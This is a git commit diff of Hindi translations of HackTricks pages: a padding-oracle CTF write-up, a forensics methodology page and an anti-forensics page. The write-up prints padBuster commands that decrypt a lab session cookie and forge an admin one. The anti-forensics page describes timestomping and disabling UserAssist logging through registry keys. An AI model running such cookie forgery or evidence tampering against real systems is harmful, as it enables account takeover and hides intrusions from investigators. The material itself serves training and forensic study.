Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u

This commit is contained in:
Translator 2024-02-07 05:45:20 +00:00
parent 6741524916
commit d5268706a9
105 changed files with 3558 additions and 3842 deletions

View file

@ -5,8 +5,6 @@
* [HackTricks](README.md)
* [HackTricks Values & faq](welcome/hacktricks-values-and-faq.md)
* [About the author](welcome/about-the-author.md)
* [Getting Started in Hacking](welcome/getting-started-in-hacking.md)
## 🤩 Generic Methodologies & Resources
* [Pentesting Methodology](generic-methodologies-and-resources/pentesting-methodology.md)
@ -40,9 +38,7 @@
* [Memory dump analysis](forensics/basic-forensic-methodology/memory-dump-analysis/README.md)
* [Volatility - CheatSheet](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)
* [Partitions/File Systems/Carving](forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md)
* [EXT](forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md)
* [File/Data Carving & Recovery Tools](forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
* [NTFS](forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md)
* [Pcap Inspection](forensics/basic-forensic-methodology/pcap-inspection/README.md)
* [DNSCat pcap analysis](forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md)
* [Suricata & Iptables cheatsheet](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md)
@ -60,7 +56,6 @@
* [Video and Audio file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md)
* [ZIPs tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md)
* [Windows Artifacts](forensics/basic-forensic-methodology/windows-forensics/README.md)
* [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md)
* [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
* [Brute Force - CheatSheet](generic-methodologies-and-resources/brute-force.md)
* [Python Sandbox Escape & Pyscript](generic-methodologies-and-resources/python/README.md)

File diff suppressed because one or more lines are too long

View file

@ -1,41 +1,45 @@
# hc0n क्रिसमस CTF - 2019
# hc0n Christmas CTF - 2019
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>
![](../../.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg)
## जाँच
## Enumeration
मैंने अपने उपकरण [**Legion**](https://github.com/carlospolop/legion) का उपयोग करके मशीन की **जाँच शुरू की**:
मैंने **मेरे टूल Legion का उपयोग करके मशीन का जाँच करना शुरू किया**:
![](<../../.gitbook/assets/image (244).png>)
2 पोर्ट खुले हैं: 80 (**HTTP**) और 22 (**SSH**)
2 खुले पोर्ट हैं: 80 (**HTTP**) और 22 (**SSH**)
वेब पेज में आप **नए उपयोगकर्ता पंजीकृत कर सकते हैं**, और मुझे ध्यान आया कि **कुकी की लंबाई उपयोगकर्ता के नाम की लंबाई पर निर्भर करती है**:
वेब पेज में आप **नए उपयोगकर्ता रजिस्टर** कर सकते हैं, और मुझे पता चला कि **कुकी की लंबाई उपयोगकर्ता के नाम की लंबाई पर निर्भर है**:
![](<../../.gitbook/assets/image (245).png>)
![](<../../.gitbook/assets/image (246).png>)
और यदि आप **कुकी** के कुछ **बाइट** को बदलते हैं तो आपको यह त्रुटि मिलती है:
और अगर आप **कुकी** के कुछ **बाइट** को बदलते हैं तो आपको यह त्रुटि मिलती है:
![](<../../.gitbook/assets/image (247).png>)
इस जानकारी के साथ और [**पैडिंग ऑरेकल दुर्बलता को पढ़ने**](../../cryptography/padding-oracle-priv.md) के साथ मैंने इसे उत्पन्न किया:
इस जानकारी के साथ और [**पैडिंग ऑरेकल वल्नरेबिलिटी को पढ़ने**](../../cryptography/padding-oracle-priv.md) के साथ मैंने इसे एक्सप्लॉइट करने में सक्षम था:
```bash
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"
```
![](<../../.gitbook/assets/image (248).png>)
![](<../../.gitbook/assets/image (249) (1).png>)
**उपयोगकर्ता व्यवस्थापक को सेट करें:**
```bash
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"
@ -46,10 +50,10 @@ perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details>

View file

@ -4,15 +4,15 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter** पर **मेरा अनुसरण करें** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स को साझा करें** [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन **The PEASS Family** की खोज करें
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।
</details>
## एक छवि बनाना और माउंट करना
## छवि बनाना और माउंट करना
{% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md" %}
[image-acquisition-and-mount.md](../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md)
@ -20,7 +20,7 @@
## मैलवेयर विश्लेषण
यह **छवि के पास होने के बाद करने के लिए आवश्यक नहीं है**। लेकिन आप इस मैलवेयर विश्लेषण तकनीक का अलग-थलग उपयोग कर सकते हैं अगर आपके पास एक फ़ाइल, फ़ाइल-सिस्टम छवि, मेमोरी छवि, पीकैप... है, तो यह अच्छा होगा कि **इन कार्रवाइयों को ध्यान में रखें**:
यह **आवश्यक नहीं है कि आप छवि के पास होने के बाद पहला कदम करें**। लेकिन आप एक फ़ाइल, फ़ाइल-सिस्टम छवि, मेमोरी छवि, pcap... के साथ इस मैलवेयर विश्लेषण तकनीकों का अलग से उपयोग कर सकते हैं, इसलिए यह **कार्रवाई को ध्यान में रखना अच्छा है**:
{% content-ref url="malware-analysis.md" %}
[malware-analysis.md](malware-analysis.md)
@ -28,13 +28,13 @@
## छवि की जांच
यदि आपको एक उपकरण की **फोरेंसिक छवि** दी जाती है, तो आप **विभाजनों, फ़ाइल-सिस्टम** का उपयोग करके शुरू कर सकते हैं और पोटेंशियली **दिलचस्प फ़ाइलें** (हटाई गई भी) को **पुनर्प्राप्त कर सकते हैं**। इसे सीखें:
यदि आपको एक उपकरण की **फोरेंसिक छवि** दी गई है तो आप **विभाजनों, फ़ाइल-सिस्टम** और **रिकवरींग** का आरंभ कर सकते हैं, संभावित रूप से **रोचक फ़ाइलें** (हाल ही में हटाई गई भी)। इसे कैसे करें जानने के लिए:
{% content-ref url="partitions-file-systems-carving/" %}
[partitions-file-systems-carving](partitions-file-systems-carving/)
{% endcontent-ref %}
उपयोग किए जाने वाले ओएस और प्लेटफ़ॉर्म के आधार पर विभिन्न दिलचस्प आर्टिफैक्ट्स खोजने चाहिए:
उपयोग किए गए ओएस और प्लेटफ़ॉर्म के आधार पर विभिन्न रोचक आर्टिफैक्ट्स खोजने चाहिए:
{% content-ref url="windows-forensics/" %}
[windows-forensics](windows-forensics/)
@ -48,16 +48,16 @@
[docker-forensics.md](docker-forensics.md)
{% endcontent-ref %}
## विशेष फ़ाइल-प्रकार और सॉफ़्टवेयर की गह जांच
## विशेष फ़ाइल-प्रकार और सॉफ़्टवेयर की गहरी जांच
यदि आपके पास बहुत **संदिग्ध फ़ाइल** है, तो **फ़ाइल-प्रकार और सॉफ़्टवेयर** पर निर्भर करता है कि कौन से **ट्रिक्स** उपयोगी हो सकते हैं।\
कुछ दिलचस्प ट्रिक्स सीखने के लिए निम्नलिखित पृष्ठ को पढ़ें:
कुछ रोचक ट्रिक्स सीखने के लिए निम्नलिखित पृष्ठ पढ़ें:
{% content-ref url="specific-software-file-type-tricks/" %}
[specific-software-file-type-tricks](specific-software-file-type-tricks/)
{% endcontent-ref %}
मैं एक विशेष उल्लेख करना चाहता हूँ पृष्ठ का:
मैं विशेष रूप से इस पृष्ठ का उल्लेख करना चाहता हूँ:
{% content-ref url="specific-software-file-type-tricks/browser-artifacts.md" %}
[browser-artifacts.md](specific-software-file-type-tricks/browser-artifacts.md)
@ -77,7 +77,7 @@
## **एंटी-फोरेंसिक तकनीकें**
एंटी-फोरेंसिक तकनीकों का उपयोग करने की संभावना को ध्यान में रखें:
एंटी-फोरेंसिक तकनीकों का संभावित उपयोग ध्यान में रखें:
{% content-ref url="anti-forensic-techniques.md" %}
[anti-forensic-techniques.md](anti-forensic-techniques.md)
@ -87,4 +87,16 @@
{% content-ref url="file-integrity-monitoring.md" %}
[file-integrity-monitoring.md](file-integrity-monitoring.md)
{% end
{% endcontent-ref %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन **The PEASS Family** की खोज करें
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।
</details>

View file

@ -1,35 +1,34 @@
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड** करें तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड** करें तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos।
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos।
</details>
# टाइमस्टैम्प
# समय-चिह्न
एक हमलावता **फ़ाइलों के टाइमस्टैम्प को बदलने** में रुचि रख सकता है।\
एमएफटी में टाइमस्टैम्प्स को खोजना संभव है जो गुणों `$STANDARD_INFORMATION` __ और __ `$FILE_NAME` में हैं।
किसी हमलावर को **फ़ाइलों के समय-चिह्नों को बदलने** में दिलचस्पी हो सकती है।\
एमएफटी में समय-चिह्नों को खोजना संभव है जो गुणों `$STANDARD_INFORMATION` __ और __ `$FILE_NAME` में हैं।
दोनों गुणों में 4 टाइमस्टैम्प्स होते हैं: **संशोधन**, **पहुंच**, **निर्माण**, और **एमएफटी रजिस्ट्री संशोधन** (MACE या MACB)।
दोनों गुणों में 4 समय-चिह्न होते हैं: **संशोधन**, **पहुंच**, **निर्माण**, और **MFT रजिस्ट्री संशोधन** (MACE या MACB)।
**Windows explorer** और अन्य उपकरण **`$STANDARD_INFORMATION`** से जानकारी दिखाते हैं।
**Windows एक्सप्लोरर** और अन्य उपकरण **`$STANDARD_INFORMATION`** से जानकारी दिखाते हैं।
## टाइमस्टॉम - एंटी-फोरेंसिक टूल
## टाइमस्टॉम्प - एंटी-फोरेंसिक टूल
यह टूल **`$STANDARD_INFORMATION`** के भीतर टाइमस्टैम्प जानकारी को **संशोधित करता है** **लेकिन** **`$FILE_NAME`** के भीतर की जानकारी को **नहीं**। इसलिए, यह संदेहास्पद गतिविधि की पहचान करना संभव है।
यह उपकरण **`$STANDARD_INFORMATION`** के भीतर समय-चिह्न जानकारी को **संशोधित** करता है **लेकिन** **`$FILE_NAME`** के भीतर जानकारी को **नहीं**। इसलिए, यह संदेहास्पद गतिविधि की पहचान करना संभव है।
## Usnjrnl
**USN Journal** (Update Sequence Number Journal), या Change Journal, Windows NT फ़ाइल सिस्टम (NTFS) की एक विशेषता है जो वॉल्यूम पर किए गए परिवर्तनों का एक रिकॉर्ड बनाए रखता है।\
इस रिकॉर्ड के संशोधनों की खोज के लिए उपकरण [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) का उपयोग संभव है।
**USN जर्नल** (अपडेट सीक्वेंस नंबर जर्नल) NTFS (Windows NT फ़ाइल सिस्टम) की एक विशेषता है जो वॉल्यूम परिवर्तनों का पता रखता है। [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) उपकरण इन परिवर्तनों का परीक्षण करने की अनुमति देता है।
![](<../../.gitbook/assets/image (449).png>)
@ -37,15 +36,13 @@ HackTricks का समर्थन करने के अन्य तरी
## $LogFile
एक फ़ाइल सिस्टम में सभी मेटाडेटा परिवर्तन सुनिश्चित करने के लिए लॉग किए जाते हैं ताकि एक सिस्टम क्रैश के बाद महत्वपूर्ण फ़ाइल सिस्टम संरचनाओं का संगत पुनर्प्राप्ति हो सके। इसे [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead\_logging) कहा जाता है।\
लॉग किए गए मेटाडेटा को "डॉलर लॉगफ़ाइल" कहा जाता है, जो एक NTFS फ़ाइल सिस्टम के एक रूट निर्देशिका में पाया जाता है।\
इस फ़ाइल को पार्स करने और परिवर्तन खोजने के लिए [LogFileParser](https://github.com/jschicht/LogFileParser) जैसे उपकरण का उपयोग संभव है।
एक फ़ाइल सिस्टम में सभी मेटाडेटा परिवर्तनों को एक प्रक्रिया में लॉग किया जाता है जिसे [व्राइट-अहेड लॉगिंग](https://en.wikipedia.org/wiki/Write-ahead_logging) के रूप में जाना जाता है। लॉग किए गए मेटाडेटा को `**$LogFile**` नामक एक फ़ाइल में रखा जाता है, जो एक NTFS फ़ाइल सिस्टम के मूल निर्देशिका में स्थित है। [LogFileParser](https://github.com/jschicht/LogFileParser) जैसे उपकरण का उपयोग इस फ़ाइल को पार्स करने और परिवर्तनों की पहचान करने के लिए किया जा सकता है।
![](<../../.gitbook/assets/image (450).png>)
फिर से, उपकरण के आउटपुट में देखा जा सकता है कि **कुछ परिवर्तन किए गए थे**
फिर, उपकरण के आउटपुट में देखा जा सकता है कि **कुछ परिवर्तन किए गए थे**
इसी उपकरण का उपयोग करके टाइमस्टैम्प्स को **किस समय संशोधित किया गया था** की पहचान संभव है:
एक ही उपकरण का उपयोग करके समय-चिह्नों को **किस समय संशोधित किया गया था** इसे पहचानना संभव है:
![](<../../.gitbook/assets/image (451).png>)
@ -56,13 +53,13 @@ HackTricks का समर्थन करने के अन्य तरी
## `$STANDARD_INFORMATION` और `$FILE_NAME` तुलना
संदेहास्पद संशोधित फ़ाइलों की पहचान के लिए एक और तरीका होगा कि दोनों गुणों पर समय की तुलना की जाए और **मिलान** के लिए देखा जाए **असंगतियाँ** के लिए
संदेहास्पद संशोधित फ़ाइलों की पहचान करने के लिए एक और तरीका हो सकता है जो दोनों गुणों पर समय की तुलना करता है और **असंगतियों** की तलाश करता है
## नैनोसेकंड
**NTFS** टाइमस्टैम्प्स का एक **प्रेसिजन** है **100 नैनोसेकंड**। फिर, 2010-10-10 10:10:**00.000:0000 जैसे टाइमस्टैम्प्स वाली फ़ाइलें खोजना बहुत संदेहास्पद है।
**NTFS** समय-चिह्नों का एक **प्रेसिजन** है **100 नैनोसेकंड**। फिर, 2010-10-10 10:10:**00.000:0000 जैसे समय-चिह्न वाली फ़ाइलें खोजना बहुत संदेहास्पद है।
## SetMace - एंटी-फोरेंसिक टूल
## SetMace - एंटी-फोरेंसिक उपकरण
यह उपकरण दोनों गुणों `$STARNDAR_INFORMATION` और `$FILE_NAME` को संशोधित कर सकता है। हालांकि, Windows Vista से, इस जानकारी को संशोधित करने के लिए एक लाइव ओएस की आवश्यकता है।
@ -78,12 +75,12 @@ NFTS एक क्लस्टर और न्यूनतम जानका
# UsbKill
यह एक उपकरण है जो कंप्यूटर को **USB** पोर्ट में किसी भी परिवर्तन को डिटेक्ट करता है तो **बंद कर देगा**।\
इसे खोजने का एक तरीका है कि चल रहे प्रक्रियाओं की जांच करें और **प्रत्येक पायथन स्क्रिप्ट की जांच करें**
यह एक उपकरण है जो कंप्यूटर को **USB** पोर्ट में किसी भी परिवर्तन को डिटेक्ट करते ही **बंद कर देगा**।\
इसे खोजने का एक तरीका यह हो सकता है कि चल रहे प्रक्रियाओं की जांच करें और **प्रत्येक पायथन स्क्रिप्ट की जांच करें**
# लाइव लिनक्स वितरण
ये डिस्ट्रो **रैम मेमोरी के अंदर चलाए जाते हैं**। इन्हें पहचानने का एकमात्र तरीका है **यदि NTFS फाइल-सिस्टम को लेखन अनुमतियों के साथ माउंट किया गया है**। यदि यह केवल पढ़ने की अनुमति के साथ माउंट किया गया है तो उसे अंतर्दृष्टि करना संभव नहीं होगा।
ये डिस्ट्रो **रैम मेमोरी के अंदर चलाई जाती हैं**। इन्हें पहचानने का एकमात्र तरीका है **यदि NTFS फाइल-सिस्टम को लेखन अनुमतियों के साथ माउंट किया गया है**। यदि यह केवल पढ़ने की अनुमतियों के साथ माउंट किया गया है तो उपद्रव का पता लगाना संभव नहीं होगा।
# सुरक्षित मिटाना
@ -93,10 +90,11 @@ NFTS एक क्लस्टर और न्यूनतम जानका
फोरेंसिक्स जांच को कठिन बनाने के लिए कई विंडोज लॉगिंग विधियों को अक्षम करना संभव है।
## टाइमस्टैम्प्स को अक्षम करें - UserAssist
## समय-चिह्नों को अक्षम करें - UserAssist
यह एक रजिस्ट्री कुंजी है जो प्रत्येक क्रियाशील द्वारा चलाई गई प्रत्येक क्रियाशील की तारीखें और घंटे बनाए रखती है
यह एक रजिस्ट्री कुंजी है जो प्रत्येक क्रियाकलाप को चलाया गया था जब प्रत्येक क्रियाकलाप को चलाया गया था
UserAssist को अक्षम करने के लिए दो कदम हैं:
1. दो रजिस्ट्री कुंजियों को सेट करें, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` और `HKEY_CURRENT
1. दो रजिस्ट्री कुंजियों को सेट करें, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` और `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, दोनों को शून्य में सेट करें ताकि हमें संकेत मिले कि हमें UserAssist अक्षम करना है।
2. `H

View file

@ -4,30 +4,28 @@
HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* यदि आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
